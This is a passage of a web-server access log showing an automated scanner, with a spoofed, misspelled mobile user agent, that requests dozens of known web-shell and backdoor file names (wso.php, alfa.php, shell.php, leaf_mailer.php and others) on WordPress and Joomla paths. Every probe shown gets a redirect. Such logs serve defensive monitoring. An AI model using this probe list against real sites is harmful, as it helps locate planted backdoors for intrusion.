AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:46 -0400] "GET /server.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:51 -0400] "GET /wp-includes/fw.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:55 -0400] "GET /4.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:03:57 -0400] "GET /5.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:04 -0400] "GET /images/about.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:07 -0400] "GET /xmlrpc.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:08 -0400] "GET /wp-load.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:11 -0400] "GET /wp-login.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:13 -0400] "GET /wp-admin/fw.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:16 -0400] "GET /mari.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:18 -0400] "GET /swm.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:22 -0400] "GET /wp-admin/radio.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:25 -0400] "GET /wp-includes/about.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:28 -0400] "GET /wp-content/wso.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:31 -0400] "GET /wp-admin/wso.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:40 -0400] "GET /w3llstore.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:42 -0400] "GET /wp-content/fx.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:45 -0400] "GET /wp-content/x.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:48 -0400] "GET /wp-admin/alfa.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:54 -0400] "GET /gank.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:56 -0400] "GET /style.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:04:58 -0400] "GET /s_e.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:02 -0400] "GET /s_ne.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:09 -0400] "GET /beence.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:11 -0400] "GET /wp-signin.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:16 -0400] "GET /moduless.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:18 -0400] "GET /export.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:21 -0400] "GET /legion.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:25 -0400] "GET /system_log.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:27 -0400] "GET /shells.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:30 -0400] "GET /wp-includes/wp-atom.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:32 -0400] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:34 -0400] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:36 -0400] "GET /wp-content/db-cache.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:41 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:43 -0400] "GET /wp-includes/css/wp-config.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:45 -0400] "GET /wp-content/themes/config.bak.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:49 -0400] "GET /wp-includes/images/css.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:51 -0400] "GET /wp-includes/css/css.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:54 -0400] "GET /wp-content/uploads/wp-stream.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:05:57 -0400] "GET /wp-beckup.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:00 -0400] "GET /wp-blog-post.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:01 -0400] "GET /wp-content/uploads/wp-blockdown.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:03 -0400] "GET /wp-admin/includes/class-wp-media-list-data.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:07 -0400] "GET /wp-admin/style.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:09 -0400] "GET /6.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:12 -0400] "GET /7.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:16 -0400] "GET /8.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:18 -0400] "GET /9.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:21 -0400] "GET /10.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.50.215.205 - - [13/Aug/2025:04:06:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [13/Aug/2025:04:06:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [13/Aug/2025:04:06:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [13/Aug/2025:04:06:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [13/Aug/2025:04:06:24 -0400] "GET /wp_class_datalib.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:26 -0400] "GET /wp-includes/wp_class_datlib.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:32 -0400] "GET /wp-includes/pomo/wp_class_datalib.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:37 -0400] "GET /01.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:41 -0400] "GET /marijuana.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:45 -0400] "GET /1xleet.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:54 -0400] "GET /wp-content/shell.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:06:58 -0400] "GET /wp-content/fw.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:00 -0400] "GET /wp-admin/shell.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:02 -0400] "GET /wp-admin/wp.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:07 -0400] "GET /4index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:11 -0400] "GET /5index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:13 -0400] "GET /6index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:15 -0400] "GET /7index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:18 -0400] "GET /8index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:21 -0400] "GET /9index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:24 -0400] "GET /Leaf.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:25 -0400] "GET /Uploader.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:29 -0400] "GET /wp-includes/wp-red.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:31 -0400] "GET /.well-known/radio.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:34 -0400] "GET /alfashell.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:39 -0400] "GET /am.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:44 -0400] "GET /blog/fw.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:52 -0400] "GET /contacts.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:07:54 -0400] "GET /demo328/fw.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:00 -0400] "GET /gif.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:04 -0400] "GET /goods.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:07 -0400] "GET /images/sym.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:10 -0400] "GET /lab.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:13 -0400] "GET /leaf_mailer.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:15 -0400] "GET /leaf_php.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:18 -0400] "GET /libraries/joomla/jmail.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:20 -0400] "GET /libraries/joomla/jmails.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:24 -0400] "GET /mailer1.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:26 -0400] "GET /ms.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:30 -0400] "GET /rxr.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:32 -0400] "GET /srx.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:37 -0400] "GET /tuco.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:40 -0400] "GET /unix.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:44 -0400] "GET /uploads/up.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 